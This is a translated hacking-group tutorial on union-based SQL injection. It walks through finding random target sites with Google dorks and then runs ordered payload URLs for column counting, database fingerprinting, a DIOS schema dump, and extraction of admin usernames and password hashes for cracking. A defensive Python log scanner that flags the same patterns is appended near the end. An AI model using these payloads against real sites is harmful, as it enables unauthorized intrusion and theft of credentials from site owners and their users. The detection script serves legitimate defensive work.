Simplified Tutorial of Union-Based SQL Injection
Mozilla Firefox
Hackbar modded (Google for "modded hackbar")
First, dorking
Google "Google dorks"; there are specific dorks that you may use.
Once you have chosen a dork and a site
Example: www.site.com/index.php?id=1
Put one of these symbols after the value: ' or *
Adding a single quote or * probes whether this point is a SQL injection point (a string-type injection point).
www.site.com/index.php?id=1'
Then, if you see an error (a MySQL error etc.),
it means the parameter is vulnerable.
Then column counting. The following uses ORDER BY [number] to determine how many columns the table has.
www.site.com/index.php?id=1'+ORDER+BY+1-- (no error)
www.site.com/index.php?id=1'+ORDER+BY+2-- (no error)
www.site.com/index.php?id=1'+ORDER+BY+3-- (no error)
www.site.com/index.php?id=1'+ORDER+BY+4-- (no error)
www.site.com/index.php?id=1'+ORDER+BY+5-- (error)
Note the error is on number 5, so the number of columns is 4. (At most 4 columns, because the fifth column produced an error.)
So let's check for the vulnerable column with the example below, putting - after the id=
www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,2,3,4--
(Running this gives the result below. The purpose is to confirm that the SQL injection can succeed; no data is obtained yet, it is enough that the numbers 1,2,3,4 can be seen.)
The purpose of id = -1 is so that 2 and 3 can be displayed, because often, if the PHP backend gets two rows of results, it only displays the first row.
If id = 1, there are two rows after the UNION. If id = -1, there is one row after the UNION, namely the 1, 2, 3 below:
id  username  password
1   2         3
A number will pop out. For example, if the vulnerable number is 2, put it like this.
Then, to check for the database, user and version, use the example below, and just replace database with user or version in the same place.
http://www.site.com/index.php?id=-1+UNION+ALL+SELECT+1%2C%40%40database%2C3%2C4--
The above is an error in the original. After URL decoding, the parameter in the original is: id=-1 union all select 1, @@database, 3 --
In fact, MySQL 5.7 has no @@database variable, but it does have the database() function. So this can be written as:
id=-1' union select 1,database(),3 --+
After URL encoding, the full path is (using the sqli-labs URL):
http://localhost/sqliphp7/Less-1/?id=-1%27%20union%20select%201,database(),3%20--+
Now you can see the result (the name of the sqli database appears):
id  username  password
1   sqli      3
To dump data, use DIOS (dump in one shot) in your Hackbar: select Union Based, then find DIOS MySQL, then pick any of them.
www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4--
I did not understand the SQL above... judging from its purpose, it seems to be trying to obtain the username?
Then find the admin table and the username column; they may be different on other sites.
After you have got the username and password columns from the tables (e.g. uname and pass),
use group_concat:
id=-1+UNION+ALL+SELECT+1,group_concat(uname,0x3c62723e,pass),3,4
That is, the following:
http://www.site.com/index.php?id=-1+UNION+ALL+SELECT+1%2Cgroup_concat%28uname%2C0x3c62723e%2Cpass%29%2C3%2C4
The 0x3c62723e is <br>. The data comes from the admin table, which is sometimes different on other sites.
Then, after you have got a password and it is encrypted, just decrypt it at hashkiller.
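Seen from the defending side, the probing sequence above (stray quote, ORDER BY ladder, UNION SELECT with @@version or database(), group_concat) leaves a recognisable trail in the web server's access log. The following Python script is an added example, not part of the original tutorial: it URL-decodes each request's query string and tags those patterns over a few constructed log lines modelled on the steps above; the log format, client IPs and the threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlparse

# Constructed Apache-style access log, modelled on the probing sequence in the tutorial
# (stray quote -> ORDER BY ladder -> UNION SELECT fingerprint). IPs and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1' HTTP/1.1" 500 120
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1'+ORDER+BY+4-- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=1'+ORDER+BY+5-- HTTP/1.1" 500 120
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=-1+UNION+ALL+SELECT+1%2C%40%40version%2C3%2C4-- HTTP/1.1" 200 530
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?id=7 HTTP/1.1" 200 498
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Each signature is checked against the URL-decoded query string (so %27 and + are normalised first).
SIGNATURES = [
    ("union_select",    re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("order_by_probe",  re.compile(r"\border\s+by\s+\d+", re.I)),
    ("fingerprint",     re.compile(r"@@\w+|\b(?:database|version|user)\s*\(\s*\)", re.I)),
    ("data_extraction", re.compile(r"\bgroup_concat\s*\(|information_schema", re.I)),
    ("stray_quote",     re.compile(r"'\s*(?:--|#|$)")),  # quote left dangling at the end of a value
]

def classify_query(query: str) -> list[str]:
    """Return the names of every probing pattern found in a raw (still encoded) query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]

def scan_log(text: str) -> list[dict]:
    """Parse access-log lines and keep only the requests that match at least one signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = urlparse(m["target"]).query
        tags = classify_query(query)
        if tags:
            hits.append({"ip": m["ip"], "status": int(m["status"]),
                         "query": unquote_plus(query), "tags": tags})
    return hits

def suspicious_clients(hits: list[dict], threshold: int = 2) -> dict[str, int]:
    """Count flagged requests per client IP; an ORDER BY ladder alone crosses a low threshold fast."""
    counts = Counter(h["ip"] for h in hits)
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

Calling scan_log(SAMPLE_LOG) flags the four probing requests from 10.0.0.5 and leaves the ordinary id=7 request alone; the alternating 500/200 statuses on the ORDER BY lines are the column-counting ladder itself.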
Like our page "COD3X CYBER ARMY"